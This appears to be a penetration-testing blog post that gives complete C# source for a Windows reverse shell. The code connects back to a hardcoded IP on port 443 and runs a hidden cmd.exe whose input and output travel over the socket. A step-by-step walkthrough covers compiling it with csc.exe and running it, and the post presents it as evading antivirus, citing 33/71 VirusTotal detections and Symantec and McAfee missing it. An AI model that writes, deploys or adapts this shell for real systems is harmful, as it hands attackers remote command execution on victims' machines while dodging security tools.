As the penetration testors, it always good to have our own written reverse shell and then compiling it rather that pulling one out of shelf.

So in this, we will manually compile our own c# based reverse shell

```
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;


namespace ConnectBack
{
	public class Program
	{
		static StreamWriter streamWriter;

		public static void Main(string[] args)
		{
			using(TcpClient client = new TcpClient("10.0.2.15", 443))
			{
				using(Stream stream = client.GetStream())
				{
					using(StreamReader rdr = new StreamReader(stream))
					{
						streamWriter = new StreamWriter(stream);
						
						StringBuilder strInput = new StringBuilder();

						Process p = new Process();
						p.StartInfo.FileName = "cmd.exe";
						p.StartInfo.CreateNoWindow = true;
						p.StartInfo.UseShellExecute = false;
						p.StartInfo.RedirectStandardOutput = true;
						p.StartInfo.RedirectStandardInput = true;
						p.StartInfo.RedirectStandardError = true;
						p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
						p.Start();
						p.BeginOutputReadLine();

						while(true)
						{
							strInput.Append(rdr.ReadLine());
							//strInput.Append("\n");
							p.StandardInput.WriteLine(strInput);
							strInput.Remove(0, strInput.Length);
						}
					}
				}
			}
		}

		private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
        {
            StringBuilder strOutput = new StringBuilder();

            if (!String.IsNullOrEmpty(outLine.Data))
            {
                try
                {
                    strOutput.Append(outLine.Data);
                    streamWriter.WriteLine(strOutput);
                    streamWriter.Flush();
                }
                catch (Exception err) { }
            }
        }

	}
}

```

We can compile the .cs with visual studio or by csc.exe that is present in the C:\Windows\Microsoft\Framework\v4.X\. After that when executed that it gives us a reverse shell to our machine. As the C# code is written by us, it has a really detection rate rather than comparing the msfvenom generated one.

<h2> Walkthrough:- </h2> <br/>

1.Copy the poc and store it as .cs file and change the IP address and port number.

![](/Images/CRS2.png)

2.Compile the C# with csc.exe and the resultant executable will be created with .exe extension.

![](/Images/CRS3.png)

3.Now executing the manually crafted reverse shell gives us a reverse shell when handler is set.

![](/Images/CRS3.png)

4.Uploading the working reverse shell to virustotal will give us 33/71 detection hit.

![](/Images/CRS5.png)

5.And guess what Symentac and Macfee didn't detect this as a threat.

![](/Images/CRS6.png)

6.Now as our lab is running an instance of Mcaffe, transfering the generated to the box and running it gives us a reverse shell right away.

![](/Images/CRS7.png)

![](/Images/CRS8.png)

![](/Images/CRS9.png)

![](/Images/CRS10.png)


<h2> References:- </h2> <br/>
1. https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple_Rev_Shell.cs


